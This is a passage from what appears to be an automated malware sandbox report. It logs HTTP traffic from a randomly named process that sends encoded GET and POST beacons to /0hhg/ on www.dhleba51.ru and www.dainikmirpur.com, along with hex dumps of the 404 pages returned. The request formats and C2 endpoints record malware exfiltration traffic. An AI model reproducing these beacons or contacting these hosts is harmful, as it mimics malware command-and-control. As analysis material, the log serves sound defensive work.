ABqDW6A8=WAreQ2+Ux5U4OF1gMgGjtCOgDwXPuKl6oCc9x3bs/4y/1wCNevgKwoAg80vhWqcSSgNeaH4SclpUW0XwwXMkgjjtteK6jw4GOKuYotCyre5hqxuDmAWcDsO1HTNMrf8MEfDBwOYn99ZdbJU3fGSWNAyoG1TDRoM3GoQoEr0zWjXF6nYpjbJXj/WAB4KjrPKlzBsJXB9bocYmQ2F+/NiyrOUqdNJABDbMiCGv4StBF6xMEHUVyM0DMNjrcfoDrXxwy0yb4sHT6N8lSXV85ZsXHZ1yvA66d0MbO7P62EE6YSXnzJ+j6nid6m+LXOPZhAVhui3i9jRXC9UDaTbO+rQD2xZTyJ0pq1Lvt6N7m94HquGJqDWmR6KTTBdWNW6rEcwYu6win/7YmLtrLRGCCeKhuRqBrblKnWh+o9gEfKu6HRKnHUfjr9MFAbb4V7xhGhtNZHb279eOc5J8eGW7+wHUsrPTAcq36Cdr591XHh+g2r3twWOWsp89CtMpsP7DXI76KeY2g+4Ll3uYe1cBW7YSmK4kFv7fC60j74DL5qIY3leYBr11fTbJWG9O9tlRczKXEsAxujhFXgSlpcMFJlHKGCB6UJLoXP3npSQwN0npvCb5dz9Ki2eTplBTLPY2cxnrgpV6zthJbXH3PAVoOwZEGe92o5CFQYtkRIXNtybX6nK9xkukURXPSzOZZWBkBxPrsg/0lO3vv1ihAoSLQWhKm3oqYlnB0jwSFO0LZYMJuB/oO2oABD72T8gqOSdN5gwEcWuxod58lH4mucLnKG08CX5BBSnoKwWkPhPv/2nkNn7CTi2HDVcmK2uDZFxorWI8LdSxfIdUmgGxhg5j3r4J96W/9X6cvpYSneCzXuTShBwRw+YdtLL2BfVjWxooOC64QK8Hczl+x5N3hT9ylP9hmPz+nT2n3DOJovIoac15oyp8FbSEaO61RZXo9rQi2s6+O/6IAb6aoCej8f2rtZ6pJVxlsYUsVls9ZjYaieeErUc [TRUNCATED]
                                                                                                    May 2, 2024 08:25:25.664294958 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 May 2024 06:25:25 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 48773
                                                                                                    Connection: close
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = [TRUNCATED]
                                                                                                    May 2, 2024 08:25:25.664309025 CEST1289INData Raw: 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64
                                                                                                    Data Ascii: put.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if
                                                                                                    May 2, 2024 08:25:25.664324045 CEST1289INData Raw: 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20
                                                                                                    Data Ascii: amp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k +
                                                                                                    May 2, 2024 08:25:25.664335966 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                                                                                    Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_
                                                                                                    May 2, 2024 08:25:25.664347887 CEST1289INData Raw: 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: put.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output);
                                                                                                    May 2, 2024 08:25:25.664360046 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a
                                                                                                    Data Ascii: ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); }
                                                                                                    May 2, 2024 08:25:25.664372921 CEST1289INData Raw: 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61
                                                                                                    Data Ascii: var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn-
                                                                                                    May 2, 2024 08:25:25.664387941 CEST1289INData Raw: 61 70 70 65 72 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 3b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                                                                                    Data Ascii: apper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex;flex-direction: column;justify-content: space-between; flex: 1 0 auto; } .logo { padding: 30px 40px; }
                                                                                                    May 2, 2024 08:25:25.664400101 CEST1289INData Raw: 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 2d 61 72 65 61 3a 20 6c 69 6e 6b 73 3b 0a 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap: 10px; font-size: 13px; } .fo
                                                                                                    May 2, 2024 08:25:25.664412975 CEST1289INData Raw: 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 33 46 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                    Data Ascii: 4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0
                                                                                                    May 2, 2024 08:25:25.875111103 CEST1289INData Raw: 36 33 34 43 34 30 2e 36 37 31 34 20 32 30 2e 38 38 35 37 20 34 30 2e 30 32 34 37 20 32 30 2e 39 34 37 35 20 33 39 2e 32 33 31 32 20 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20
                                                                                                    Data Ascii: 634C40.6714 20.8857 40.0247 20.9475 39.2312 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.449745195.24.68.580916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:28.179936886 CEST435OUTGET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= HTTP/1.1
                                                                                                    Host: www.dhleba51.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:25:28.389938116 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 May 2024 06:25:28 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 48773
                                                                                                    Connection: close
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = [TRUNCATED]
                                                                                                    May 2, 2024 08:25:28.389955044 CEST1289INData Raw: 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64
                                                                                                    Data Ascii: put.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if
                                                                                                    May 2, 2024 08:25:28.389969110 CEST1289INData Raw: 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20
                                                                                                    Data Ascii: amp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k +
                                                                                                    May 2, 2024 08:25:28.390897989 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                                                                                    Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_
                                                                                                    May 2, 2024 08:25:28.391047955 CEST1289INData Raw: 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: put.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output);
                                                                                                    May 2, 2024 08:25:28.391060114 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a
                                                                                                    Data Ascii: ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); }
                                                                                                    May 2, 2024 08:25:28.391076088 CEST1289INData Raw: 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61
                                                                                                    Data Ascii: var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn-
                                                                                                    May 2, 2024 08:25:28.391237020 CEST1289INData Raw: 61 70 70 65 72 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 3b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                                                                                    Data Ascii: apper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex;flex-direction: column;justify-content: space-between; flex: 1 0 auto; } .logo { padding: 30px 40px; }
                                                                                                    May 2, 2024 08:25:28.391907930 CEST1289INData Raw: 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 2d 61 72 65 61 3a 20 6c 69 6e 6b 73 3b 0a 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap: 10px; font-size: 13px; } .fo
                                                                                                    May 2, 2024 08:25:28.391920090 CEST1289INData Raw: 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 33 46 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                    Data Ascii: 4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0
                                                                                                    May 2, 2024 08:25:28.596263885 CEST1289INData Raw: 36 33 34 43 34 30 2e 36 37 31 34 20 32 30 2e 38 38 35 37 20 34 30 2e 30 32 34 37 20 32 30 2e 39 34 37 35 20 33 39 2e 32 33 31 32 20 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20
                                                                                                    Data Ascii: 634C40.6714 20.8857 40.0247 20.9475 39.2312 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.449746192.250.235.3680916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:34.487993002 CEST711OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dainikmirpur.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.dainikmirpur.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 36 79 70 6c 4b 64 63 4d 71 73 71 34 6a 59 4f 6c 77 35 73 55 6a 77 68 76 37 78 6d 73 2f 73 74 61 79 6c 47 45 7a 74 67 63 69 77 4d 61 51 4b 43 46 38 35 2b 4e 4e 57 48 76 74 6e 58 57 65 39 36 6b 72 74 6a 59 57 52 4e 6c 30 62 74 71 4a 47 4a 4e 69 51 6d 56 50 75 42 6e 30 37 51 50 31 74 6b 73 4a 6f 6e 72 4b 39 72 67 76 32 49 48 4f 33 6b 71 77 65 38 6e 42 54 4d 4b 32 4b 5a 57 33 72 46 4b 62 62 73 4d 48 34 74 69 6a 4f 54 43 64 66 6d 55 42 44 67 5a 73 30 2f 61 78 47 56 46 56 55 6d 65 66 4f 52 39 38 7a 7a 41 44 72 35 44 41 30 34 75 6a 74 52 71 73 49 76 31 47 6d 6f 5a 51 6a 70 51 33 67 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=6yplKdcMqsq4jYOlw5sUjwhv7xms/staylGEztgciwMaQKCF85+NNWHvtnXWe96krtjYWRNl0btqJGJNiQmVPuBn07QP1tksJonrK9rgv2IHO3kqwe8nBTMK2KZW3rFKbbsMH4tijOTCdfmUBDgZs0/axGVFVUmefOR98zzADr5DA04ujtRqsIv1GmoZQjpQ3g==
                                                                                                    May 2, 2024 08:25:34.982774973 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1163
                                                                                                    date: Thu, 02 May 2024 06:25:34 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advis [TRUNCATED]
                                                                                                    May 2, 2024 08:25:34.982795000 CEST130INData Raw: 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74
                                                                                                    Data Ascii: hnologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.449747192.250.235.3680916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:38.187688112 CEST731OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dainikmirpur.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.dainikmirpur.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 36 79 70 6c 4b 64 63 4d 71 73 71 34 6c 34 2b 6c 33 59 73 55 6c 51 68 73 69 78 6d 73 78 38 74 65 79 6c 61 45 7a 73 56 42 68 44 6b 61 58 72 79 46 75 49 2b 4e 42 32 48 76 31 58 58 54 51 64 36 56 72 74 76 32 57 52 78 6c 30 66 4e 71 4a 47 35 4e 69 6a 2b 53 4f 2b 42 79 35 62 51 42 71 64 6b 73 4a 6f 6e 72 4b 35 4c 65 76 32 41 48 4e 48 30 71 78 2f 38 6d 61 7a 4d 4a 78 4b 5a 57 7a 72 46 57 62 62 74 72 48 35 78 45 6a 4d 72 43 64 64 2b 55 43 53 67 61 69 30 2f 63 31 47 55 55 55 6b 2b 62 5a 4d 34 38 68 41 61 37 63 36 46 36 4d 53 70 30 79 63 77 39 2b 49 4c 47 62 68 68 74 64 67 55 5a 73 6a 73 4f 48 6a 4d 6c 43 48 6b 78 4f 42 54 4c 59 6e 78 48 57 4b 38 3d
                                                                                                    Data Ascii: ABqDW6A8=6yplKdcMqsq4l4+l3YsUlQhsixmsx8teylaEzsVBhDkaXryFuI+NB2Hv1XXTQd6Vrtv2WRxl0fNqJG5Nij+SO+By5bQBqdksJonrK5Lev2AHNH0qx/8mazMJxKZWzrFWbbtrH5xEjMrCdd+UCSgai0/c1GUUUk+bZM48hAa7c6F6MSp0ycw9+ILGbhhtdgUZsjsOHjMlCHkxOBTLYnxHWK8=
                                                                                                    May 2, 2024 08:25:38.690109968 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
